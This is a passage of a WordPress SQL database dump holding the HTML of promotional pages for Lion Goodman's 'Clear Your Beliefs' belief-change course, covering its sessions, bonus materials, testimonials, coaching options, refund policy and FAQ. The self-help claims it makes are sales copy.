</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n\r\n\r\n&nbsp;\r\n<h1 id="bonus">Optional Support On Your Journey Into Your Subconscious</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>You can easily take this journey on your own, one recorded session at a time. You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.  \r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, in any part of your life, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. Your coach will meet with you by phone (or Skype) each week, at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you best - from the recorded program-only, to full support each week.\r\n\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:45:08', '2014-06-19 06:45:08', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(982, 2, '2014-06-17 20:02:44', '2014-06-18 01:02:44', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about 